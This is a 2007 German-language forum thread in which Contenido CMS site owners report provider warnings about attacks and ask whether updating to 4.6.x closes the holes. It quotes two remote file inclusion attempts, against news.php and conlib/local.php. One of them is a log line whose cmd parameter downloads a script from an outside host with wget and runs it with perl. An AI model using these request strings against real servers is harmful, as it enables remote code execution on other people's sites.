Seite 1 von 1

Sicherheitslücke Contenido 4.5.2 ALPHA!

Verfasst: Fr 26. Jan 2007, 09:39
von Andreas
Hallo,

wir erhielten von unserem Provider folgende Meldung zu einem Hacker-Angriff auf eine Contenido-Installation (4.5.2 ALPHA):

"...unseren Server-Überwachungs-Tools ist ein Hackversuch auf Ihrer Präsenz über die von Ihnen installierte Anwendung .../contenido/external/frontend/news.php aufgefallen.
Mittels des Aufrufs in ...contenido/external/frontend/news.php?cfg[path][includes]=http://k-is.info/ayen.htm? wurde von der IP-Adresse "125.162.0.78" versucht eine eigene Anwendung auf der Präsenz zu installieren. (Dieser Versuch konnte von unserem Überwachungs-Tool verhindert werden und ist auch im Webserver-Logfile im /logs-Ordner Ihres Webspace zu finden.)
Wir möchten Sie bitten zu überprüfen ob der ungebetene Besucher evtl. doch Daten auf Ihrer Präsenz verändern konnte. Selbstverständlich sollten Sie außerdem die unsichere Anwendung durch eine sichere Variante ersetzen. Falls Sie Ihre Präsenz auf einem Content Management oder Foren System aufgebaut ist, sollten Sie dringend die vom Hersteller angebotenen Sicherheitsupdates einspielen...."


Ist jemandem diese Sicherheitslücke bekannt?
Was kann dagegen getan werden?

Über eine schnelle Antwort wäre ich dankbar.

Gruß
Andreas

Verfasst: Fr 26. Jan 2007, 10:07
von emergence
ein update auf die 4.6.18 wäre vielleicht keine schlechte idee...

die datei news.php gibts da nicht mehr und einige andere sicherheitslücken wurden auch geschlossen...

Verfasst: Fr 26. Jan 2007, 10:15
von Dodger77
emergence hat geschrieben:ein update auf die 4.6.18 wäre vielleicht keine schlechte idee...
Vielleicht reicht erst mal die 4.6.15.

Crackversuch "/contenido/conlib/local.php"

Verfasst: Mo 14. Mai 2007, 07:36
von andy-man
Hallo, wir haben heute folgende Meldung erhalten:

Es handelt sich um das Script "/contenido/conlib/local.php", welches über den Parameter "cfg[path][contenido]" die Ausführung beliebigen Codes erlaubt:

201.66.106.220 - - [10/May/2007:22:10:07 +0200] "GET //contenido/conlib/local.php?cfg[path][contenido]=http://kuskitiz0r.kit.
net/cmdpriv8/tool25.dat?&cmd=cd%20/var/tmp;wget%20http://www.overflow.ne
tfast.org/groupp.txt%20;perl%20groupp.txt HTTP/1.1" 200 9549 www.weilerbach.de "-" "Mozilla/3.0 (compatible; Indy Library)" "-"

.....

ist dies Euch bekannt. Ist diese Sicherheitslücke druch ein Update auf die 4.6.15 geschlossen?

Danke Andy-man